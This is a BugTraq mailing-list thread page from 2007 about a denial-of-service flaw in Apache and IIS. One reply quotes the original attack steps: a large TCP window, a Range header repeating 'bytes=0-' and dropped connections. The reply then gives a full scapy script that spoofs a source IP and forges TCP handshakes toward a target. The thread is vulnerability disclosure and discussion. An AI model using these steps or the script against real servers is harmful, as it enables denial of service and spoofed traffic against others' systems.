BugTraq
a cheesy Apache / IIS DoS vuln (+a question) Jan 03 2007 11:27PM
Michal Zalewski (lcamtuf dione ids pl) (4 replies)
Re: a cheesy Apache / IIS DoS vuln (+a question) Jan 05 2007 08:45AM
bugtraq (bugtraq securityfocus lists bitrouters com) (1 replies)
Re: a cheesy Apache / IIS DoS vuln (+a question) Jan 09 2007 06:15AM
William A. Rowe, Jr. (wrowe rowe-clan net) (1 replies)
Re: a cheesy Apache / IIS DoS vuln (+a question) Jan 10 2007 10:04AM
bugtraq (bugtraq securityfocus lists bitrouters com)
Re: a cheesy Apache / IIS DoS vuln (+a question) Jan 04 2007 12:36PM
Siim Põder (windo p6drad-teel net)
Michal Zalewski wrote:
> 1) Connect to the server (as many times as allowed by the remote party
> or deemed appropriate for the purpose of this demonstration),
>
> 2) Negotiate a high TCP window size for each of the connections (1 GB
> should be doable),
>
> 3) Send a partial request as follows for each of the connections:
> GET /foo.html HTTP/1.1
> Host: example.com
> Range: bytes=0-,0-,0-,0-,0-... (up to 8 kB for Apache, 16 kB for IIS)
>
> Each "0-" would generate a separate multipart/byteranges containing
> the entire file (bytes from 0 'til EOF).
>
> 4) Send a closing newline within each of the connections to commit
> the request,
>
> 5) Silently drop the connections, possibly re-connect to dial-up / DSL
> to duck the responses that would keep pouring at full speed until
> TCP window size is exhausted or an ISP-level non-delivery /
> congestion control mechanism kicks in (and isn't filtered out
> down the route).
>
> This should cause the server to send gigabytes of data, with only a
> minimal bandwidth expense on the attacker's end.

Did you actually try it? I can't produce this, so there's propably
something I'm missing. SYN with window scaling 10, request an url, ack
packets until ctrl-c. At least the apache on my personal linux server
immediately stops sending new packets after the acks stop.

Tried the following scapy script:

#!/usr/bin/env python

import sys
from scapy import *
conf.verb=0

if len(sys.argv) != 5:
print "Usage: ./wscale.py <target> <spoofed_ip> <port> <url>"
sys.exit(1)

print sys.argv[3]
lport=random.randint(1025,6000)

print "SEND SYN:"
handshake1=IP(src=sys.argv[2],
dst=sys.argv[1])/TCP(dport=int(sys.argv[3]), sport=lport, flags="S",
seq=1, options=[('WScale', 10)])
handshake1.payload.show()
ans1 = sr1(handshake1)

print "RECV SYNACK:"
ans1.payload.show()

acking=ans1.payload.seq+1

print "SEND ACK:"
handshake2=IP(src=sys.argv[2],
dst=sys.argv[1])/TCP(dport=int(sys.argv[3]), sport=lport, flags="A",
seq=2, ack=acking)
handshake2.payload.show()
send(handshake2)

print "SEND REQ:"
request=IP(src=sys.argv[2], dst=sys.argv[1])/TCP(dport=int(sys.argv[3]),
sport=lport, flags="A", seq=2, ack=acking)/Raw("GET " + sys.argv[4] + "
HTTP/1.0\n\n")
request.payload.show()
ans2=sr1(request)

print "RECV DATA1:"
ans2.payload.show()

while True:
ack=IP(src=sys.argv[2], dst=sys.argv[1])/TCP(dport=int(sys.argv[3]),
sport=lport, flags="A", seq=(ans2.payload.ack),
ack=(ans2.payload.seq+len(ans2.payload.payload)))
ans2=sr1(ack)
print ans2.payload.show()

[ reply ]
Re: a cheesy Apache / IIS DoS vuln (+a question) Jan 04 2007 11:45AM
Pieter de Boer (pieter thedarkside nl) (1 replies)
Re: a cheesy Apache / IIS DoS vuln (+a question) Jan 04 2007 06:47PM
Rob Sherwood (capveg cs umd edu)
Re: a cheesy Apache / IIS DoS vuln (+a question) Jan 04 2007 05:35AM
William A. Rowe, Jr. (wrowe rowe-clan net) (2 replies)
Re: a cheesy Apache / IIS DoS vuln (+a question) Jan 05 2007 07:11AM
Gadi Evron (ge linuxbox org)
Re: a cheesy Apache / IIS DoS vuln (+a question) Jan 04 2007 08:18AM
Michal Zalewski (lcamtuf dione ids pl)


 

Privacy Statement
Copyright 2010, SecurityFocus